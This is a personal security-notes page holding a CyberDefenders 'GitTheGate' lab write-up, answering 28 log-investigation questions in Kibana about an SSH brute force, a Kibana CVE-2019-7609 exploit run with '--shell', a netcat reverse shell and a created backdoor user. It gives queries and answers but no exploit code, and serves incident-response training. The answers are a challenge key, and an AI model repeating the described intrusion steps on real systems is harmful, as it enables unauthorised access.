FaresMorcy
  • Whoami
  • Footprinting Labs
    • Lab - Easy
    • Lab - Medium
    • Lab - Hard
  • Shells & Payloads
    • The Live Engagement
  • Password Attacks
    • Lab - Easy
    • Lab - Medium
    • Lab - Hard
  • SOC Hackthebox Notes & Labs
    • Security Monitoring & SIEM Fundamentals Module
    • Windows Event Logs & Finding Evil Module
    • Introduction to Threat Hunting & Hunting With Elastic Module
    • Understanding Log Sources & Investigating with Splunk Module
      • Introduction To Splunk & SPL
      • Using Splunk Applications
      • Intrusion Detection With Splunk (Real-world Scenario)
      • Detecting Attacker Behavior With Splunk Based On TTPs
      • Detecting Attacker Behavior With Splunk Based On Analytics
      • Skills Assessment
    • Windows Attacks & Defense
      • Kerberoasting
      • AS-REProasting
      • GPP Passwords
      • GPO Permissions/GPO Files
      • Credentials in Shares
      • Credentials in Object Properties
      • DCSync
      • Golden Ticket
      • Kerberos Constrained Delegation
      • Print Spooler & NTLM Relaying
      • Coercing Attacks & Unconstrained Delegation
      • Object ACLs
      • PKI - ESC1
      • Skills Assessment
    • Intro to Network Traffic Analysis Module
    • YARA & Sigma for SOC Analysts Module
      • Developing YARA Rules
      • Hunting Evil with YARA (Windows Edition)
      • Hunting Evil with YARA (Linux Edition)
      • Sigma and Sigma Rules
      • Developing Sigma Rules
      • Hunting Evil with Sigma (Chainsaw Edition)
      • Hunting Evil with Sigma (Splunk Edition)
      • Skills Assessment
  • TryHackme SOC 1
    • TShark
      • TShark: The Basics
      • TShark: CLI Wireshark Features
      • TShark Challenge I: Teamwork
      • TShark Challenge II: Directory
    • Tempest
    • Boogeyman 1
    • Boogeyman 2
    • Boogeyman 3
  • TryHackme SOC 2
    • Advanced Splunk
      • Splunk: Exploring SPL
      • Splunk: Setting up a SOC Lab
      • Splunk: Dashboards and Reports
      • Splunk: Data Manipulation
      • Fixit
    • Advanced ELK
      • Slingshot
    • Threat Hunting
      • Threat Hunting: Foothold
      • Threat Hunting: Pivoting
      • Threat Hunting: Endgame
  • TryHackme Rooms
    • Investigating Windows
    • Splunk 2
    • Windows Network Analysis
  • Powershell Scripting Fundamentals
  • SANS SEC504 & Labs
    • Book one
      • Live Examination
      • Network Investigations
      • Memory Investigations
      • Malware Investigations
      • Accelerating IR with Generative AI
      • Bootcamp: Linux Olympics
      • Bootcamp: Powershell Olympics
    • Book Two
      • Hacker Tools and Techniques Introduction
      • Target Discovery and Enumeration
      • Discovery and Scanning with Nmap
      • Cloud Spotlight: Cloud Scanning
      • SMB Security
      • Defense Spotlight: Hayabusa and Sigma Rules
    • Book Three
      • Password Attacks
      • Cloud Spotlight: Microsoft 365 Password Attacks
      • Understanding Password Hashes
      • Password Cracking
      • Cloud Spotlight: Insecure Storage
      • Multipurpose Netcat
    • Book Four
      • Metasploit Framework
      • Drive-By Attacks
      • Command Injection
      • Cross-Site Scripting
      • SQL Injection
      • Cloud Spotlight: SSRF and IMDS
    • Book Five
      • Endpoint Security Bypass
      • Pivoting and Lateral Movement
      • Hijacking Attacks
      • Establishing Persistence
      • Defense Spotlight: RITA
      • Cloud Spotlight: Cloud Post-Exploitation
  • SANS SEC511 & Labs
    • Resources
      • Primers
      • References
      • Tools
        • Network
        • Elastic Stack
      • Printable Versions
    • Book One
      • Part One
      • Part Two
      • Part Three
    • Book Two
      • Part One
      • Part Two
      • Part Three
      • Part Four
    • Book Three
      • Part One
      • Part Two
      • Part Three
      • Part Four
    • Book Four
      • Part One
      • Part Two
      • Part Three Lab
      • Part Four Lab
    • Book Five
      • Part One Lab
      • Part Two Lab
      • Part Three Lab
  • CyberDefenders
    • XXE Infiltration Lab
    • T1594 Lab
    • RetailBreach Lab
    • DanaBot Lab
    • OpenWire Lab
    • BlueSky Ransomware Lab
    • Openfire Lab
    • Boss Of The SOC v1 Lab
    • GoldenSpray Lab
    • REvil Lab
    • ShadowRoast Lab
    • SolarDisruption Lab
    • Kerberoasted Lab
    • T1197 Lab
    • Amadey Lab
    • Malware Traffic Analysis 1 Lab
    • Insider Lab
    • Volatility Traces Lab
    • FalconEye Lab
    • GitTheGate Lab
    • Trident Lab
    • NerisBot Lab
  • Practical Windows Forensics
    • Data Collection
    • Examination
    • Disk Analysis Introduction
    • User Behavior
    • Overview of disk structures, partitions and file systems
    • Finding Evidence of Deleted Files with USN Journal Analysis
    • Analyzing Evidence of Program Execution
    • Finding Evidence of Persistence Mechanisms
    • Uncover Malicious Activity with Windows Event Log Analysis
    • Windows Memory Forensic Analysis
  • Hackthebox Rooms
    • Campfire-1
    • Compromised
    • Brutus
    • Trent
    • CrownJewel-1
  • WEInnovate Training
    • Weinnovate - Active Directory Task One
    • Build ELK Lab
      • Configure Elasticsearch and Kibana setup in ubuntu
      • Configure Fluent-Bit to send logs to ELK
      • Set up Winlogbeat & Filebeat for log collection
      • Send Logs from Winlogbeat through Logstash to ELK
      • Enable Windows Audit Policy & Winlogbeat
      • Elasticsearch API and Ingestion Pipeline
    • SOAR
      • Send Alerts To Email & Telegram Bot
      • Integrate Tines with ELK
    • SOC Practical Assessment
    • Lumma C2
    • Network Analysis
  • Build ELK Lab
    • Configure Elasticsearch and Kibana setup in ubuntu
    • Configure Fluent-Bit to send logs to ELK
    • Set up Winlogbeat & Filebeat for log collection
    • Send Logs from Winlogbeat through Logstash to ELK
    • Enable Windows Audit Policy & Winlogbeat
    • Elasticsearch API and Ingestion Pipeline
  • Build Home Lab - SOC Automation
    • Install & configure Sysmon for deep Windows event logging
    • Set up Wazuh & TheHive for threat detection & case management
    • Execute Mimikatz & create detection rules in Wazuh
    • Automate everything with Shuffle
    • Response to SSH Attack Using Shuffle, Wazuh, and TheHive
  • Home Lab (Attack & Defense Scenarios)
    • Pass-the-Hash Attack & Defense
    • Scheduled Task Attack & Defense
    • Kerberoasting Attack & Defense
    • Kerberos Constrained Delegation
    • Password Spraying Attack & Defense
    • Golden Ticket Attack & Defense
    • AS-REProasting Attack & Defense
    • DCSync Attack & Defense
  • Home Lab (FIN7 (Carbanak Group) – Point of Sale (POS) Attack on Hospitality Chains)
  • Home Lab (Lumma Stealer)
Powered by GitBook
On this page
  1. CyberDefenders

GitTheGate Lab

PreviousFalconEye LabNextTrident Lab

Last updated 5 months ago

Q1) Using the "View Surrounding Documents" option, find the ID of the document that is 14 documents before (older) the id GDQOB3IBwJHf9VOW-r0Y?

_id: GDQOB3IBwJHf9VOW-r0Y

Answer: tzQOB3IBwJHf9VOW-Lyd

Q2) Using the "View Surrounding Documents" option, find the IP of the document that is 16 documents after (newer) the id vDQOB3IBwJHf9VOW-Lyd?

Answer: 191.189.39.130

Q3) How many requests have come from the IP address 2.49.53.218 between the 6th of May and the 13th of May? (time is in UTC)

ip: 2.49.53.218

Answer: 7

Q4) What percentage of logs are from windows 8 machines on the 11th of May? (time is in UTC)

Answer: 21.74%

Q5) How many 503 errors were there on the 8th of May? (time is in UTC)

response: 503

Answer: 8

Q6) How many connections to the host "www.elastic.co" were made on the 12th of May? (time is in UTC)

host: www.elastic.co

Answer: 82

Q7) What is the second most common extension of files being accessed on the 12th of May? (time is in UTC)

Answer: .gz

Q8) Find the first IP address to connect to the host elastic-elastic-elastic.org on the 12th of May. (time is in UTC)

host: "elastic-elastic-elastic.org"

Answer: 114.246.225.218

Q9) What was the username used that failed to log in on the 15th of May at 10:44 pm? (time is in UTC)

event.type: "authentication_failure"

Answer: deploy

Q10) According to the logs, which vulnerable version of Kibana was identified as running in the stack?

Answer: 7.6.2

Q11) Using current data in the auditbeat index, what is the name of the elasticsearch node? (one word)

Answer: elkstack

Q12) What is the name of the beat to collect windows logs? (one word)

Answer: winlogbeat

Q13) What is the name of the beat that sends network data? (one word)

Answer: packetbeat

Q14) How many fields are in the auditbeat-* index pattern?

Answer: 437

Q15) On the 14th of May, how many failed authentication attempts did the host server receive? (time is in UTC)

event.type: authentication_failure

Answer: 762

Q16) On the 13th and 14th of May, how many bytes were received by the source IP 159.89.203.214 (time is in UTC)

source.ip: "159.89.203.214"

Answer: 492,919

Q17) What username did they crack?

event.type: 'authentication_success'
event.type: 'authentication_failure'

Answer: johnny

Q18) What host was attacked?

Answer: sshbox

Q19) How many were failed attempts made on the machine?

event.type: 'authentication_failure'

Answer: 12523

Q20) What time was the last failed attempted login?

event.type: 'authentication_failure' and host.name: 'sshbox'

Answer: 11:39:31

Q21) What time did the attacker successfully login?

Based on the scenario, the attack is believed to have occurred on May 25th between 9:00 AM and 11:30 AM.

Answer: 11:50:13

Q22) What tool did the attacker use to get the exploit onto the machine?

Answer: git

Q23) Shortly after getting the exploit on the machine, the attacker used vim to create a file. What is the name of that file?

Answer: ElasticCTFisFun!

Q24) What is the filename of the exploit that was run?

Answer: CVE-2019-7609-kibana-rce.py

Q25) What is the first ID of the log that shows the exploit being run?

agent.hostname:"sshbox"  and *CVE-2019-7609-kibana-rce.py*

Answer: _SHbS3IBCEolQs9lAD3z

Q26) What parameter turned the script from testing to exploiting?

Answer: --shell

Q27) Determining the destination IP is key to tracing the attacker’s actions. What is the destination IP address where the malicious shell was sent?

agent.hostname:"sshbox"  and process.name:"nc"

Answer: 10.116.0.2

Q28) Identifying new users is vital to uncovering unauthorized access. What was the name of the user they created?

process.name: useradd 

Answer: Thanks4Playing

From this link:

https://github.com/LandGrey/CVE-2019-7609